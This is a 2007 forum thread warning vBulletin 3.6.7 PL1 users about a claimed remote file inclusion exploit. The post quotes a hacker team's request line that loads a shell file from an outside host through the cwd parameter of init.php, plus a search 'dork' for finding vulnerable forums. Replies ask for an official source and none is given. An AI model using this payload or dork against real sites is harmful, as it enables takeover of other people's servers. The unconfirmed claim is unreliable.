Forum Owners
November 20, 2008, 07:03:31 PM *
Welcome, Guest. Please login or register.

Login with username, password and session length
News: SMF - Just Installed!
 
   Home   Help Search Login Register  
Forum Owners > Forum Software > vBulletin > Attention to all Vbulletin 3.6.7 PL1 users !!
Pages: [1]
« previous next »
  Print  
Author Topic: Attention to all Vbulletin 3.6.7 PL1 users !!  (Read 408 times)
Xmen
Newbie
*
Offline Offline

Posts: 8


View Profile
« on: July 11, 2007, 09:13:16 PM »
This is to make users alert who are using Vb 3.6.7 PL1,there is a new exploit out by a hackers team,this exploit will enter your shell of Vb and take charge of it  Angry

In short someone caneasily hack your Vb forum  Shocked

This exploit is known as Remote File Inclusion

Code:
#Exploit
#user name :black al3akrab
r@r3d-crew.com
Code in: global.php
#Vul code:Vul code:require_once(CWD . '/includes/init.php');
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
#Exploit
#http://www.name.com/forum/includes/init.php?cwd=http://r3d-crew.com/sshell.txt?
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
#dork: vBulletin 3.6.7 PL1
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
#Team-Hackers-al3akrab
Logged
ForumOwner
Administrator
Full Member
*****
Offline Offline

Posts: 139


View Profile WWW
« Reply #1 on: July 12, 2007, 04:26:02 PM »
Thanks for the heads up, Xmen.  Do you have a reference on the vBulletin site to the announcement?  I could not see one.
Logged
internetg33k
Newbie
*
Offline Offline

Posts: 15


View Profile
« Reply #2 on: October 02, 2007, 03:06:01 PM »
Yeah. Where did you get this annoucement from. I just updated my vbulletin to 3.6.8
Logged
Pages: [1]
  Print  
« previous next »
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.5 | SMF © 2006-2008, Simple Machines LLC Valid XHTML 1.0! Valid CSS!